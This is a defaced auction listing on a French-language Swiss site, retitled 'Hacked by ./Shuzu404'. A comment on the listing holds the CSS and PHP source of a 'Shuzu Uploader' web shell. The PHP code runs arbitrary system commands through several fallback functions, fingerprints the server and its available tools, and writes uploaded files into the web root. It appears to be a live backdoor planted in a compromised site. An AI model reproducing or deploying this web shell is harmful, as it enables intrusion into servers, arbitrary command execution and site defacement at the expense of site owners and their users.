Unicosy > Enchères > Hacked by ./Shuzu404

Hacked by ./Shuzu404

  • Quantité:

    100 articles

  • Achat immédiat:

    CHF1,004.00

  •  

  • Faire une offre:

    CHF

  •  

ID de l'enchère:
#2428
Emplacement:
Date de début:
25th of juin 2019 at 9:50
Temps restant:

0

Liste de favoris:
Détails de l'article
Rental price 10
Caracteristics Balcony
Basement
Parking Space
Garden
Veranda
Attic
Bathroom 5
Toilet 5
Bedrooms 10
Laundry None
Description

Hacker Patah Hati

Galerie d'images
Emplacement carte
Commentaires

2 thoughts on “Hacked by ./Shuzu404

  1. shuzu dit :

    table{
    background: black;
    border: solid 1px red;
    }
    h1{
    color: white;
    font-face: monospace;
    size: 10;
    text-align: center;
    text-shadow:0 1px 0 red;
    }
    a{
    color: white;
    text-decoration:none
    }
    .cont a{

    text-decoration: none;
    font-family: Monospace ;
    font-size: 16px;
    }
    button{
    background: transparent;
    border: 1px solid red;
    }

    [ Shuzu Uploader ]

    body{
    background: black;
    font-family: monospace;
    }

    <?php
    function asu($dir,$perm) {
    if(!is_writable($dir)) {
    return "”.$perm.””;
    } else {
    return “”.$perm.””;
    }
    }
    function kontol($dir,$perm) {
    if(!is_readable($dir)) {
    return “”.$perm.””;
    } else {
    return “”.$perm.””;
    }
    }
    function exe($cmd) {
    if(function_exists(‘system’)) {
    @ob_start();
    @system($cmd);
    $dia = @ob_get_contents();
    @ob_end_clean();
    return $dia;
    } elseif(function_exists(‘exec’)) {
    @exec($cmd,$results);
    $dia = “”;
    foreach($results as $result) {
    $dia .= $result;
    } return $dia;
    } elseif(function_exists(‘passthru’)) {
    @ob_start();
    @passthru($cmd);
    $dia = @ob_get_contents();
    @ob_end_clean();
    return $dia;
    } elseif(function_exists(‘shell_exec’)) {
    $dia = @shell_exec($cmd);
    return $dia;
    }
    }
    if(isset($_GET[‘dir’])) {
    $dir = $_GET[‘dir’];
    chdir($dir);
    } else {
    $dir = getcwd();
    }
    $kernel = php_uname();
    $ip = gethostbyname($_SERVER[‘HTTP_HOST’]);
    $dir = str_replace(“\\”,”/”,$dir);
    $scdir = explode(“/”, $dir);
    $sm = (@ini_get(strtolower(“safe_mode”)) == ‘on’) ? “ON” : “OFF”;
    $ds = @ini_get(“disable_functions”);
    $mysql = (function_exists(‘mysql_connect’)) ? “ON” : “OFF”;
    $curl = (function_exists(‘curl_version’)) ? “ON” : “OFF”;
    $wget = (exe(‘wget –help’)) ? “ON” : “OFF”;
    $perl = (exe(‘perl –help’)) ? “ON” : “OFF”;
    $python = (exe(‘python –help’)) ? “ON” : “OFF”;
    $php = (exe(‘php –help’)) ? ” ON” : “OFF”;
    $show_ds = (!empty($ds)) ? “$ds” : “NONE”;
    $sym = (exe(‘cd /etc/’)) ? “Maybe ON” : “OFF”;
    echo “”;
    echo’
    ‘;
    echo “System: “.$kernel.””;
    echo “Server IP: “.$ip.” | Your IP: “.$_SERVER[‘REMOTE_ADDR’].””;
    echo “Safe Mode: $sm | Disable Functions: $show_ds”;
    echo “MySQL: $mysql | Perl: $perl | Python: $python | PhP: $php | WGET: $wget | CURL: $curl | Symlink: $sym “;
    echo ‘

    ‘;
    echo ”

    “;
    $root = $_SERVER[‘DOCUMENT_ROOT’];
    $files = $_FILES[‘idx_file’][‘name’];
    $dest = $root.’/’.$files;
    if(isset($_POST[‘upload’])) {
    if(is_writable($root)) {
    if(@copy($_FILES[‘idx_file’][‘tmp_name’], $dest)) {
    $web = “http://”.$_SERVER[‘HTTP_HOST’].”/”;
    echo “Uploaded: $web/$files“;
    } else {
    echo “Failed Upload”;
    }
    } else {
    if(@copy($_FILES[‘idx_file’][‘tmp_name’], $files)) {
    echo “Uploaded: $files“;
    } else {
    echo “Failed Upload”;
    }
    }
    }
    ?>

    Visit Our Blog

Laisser un commentaire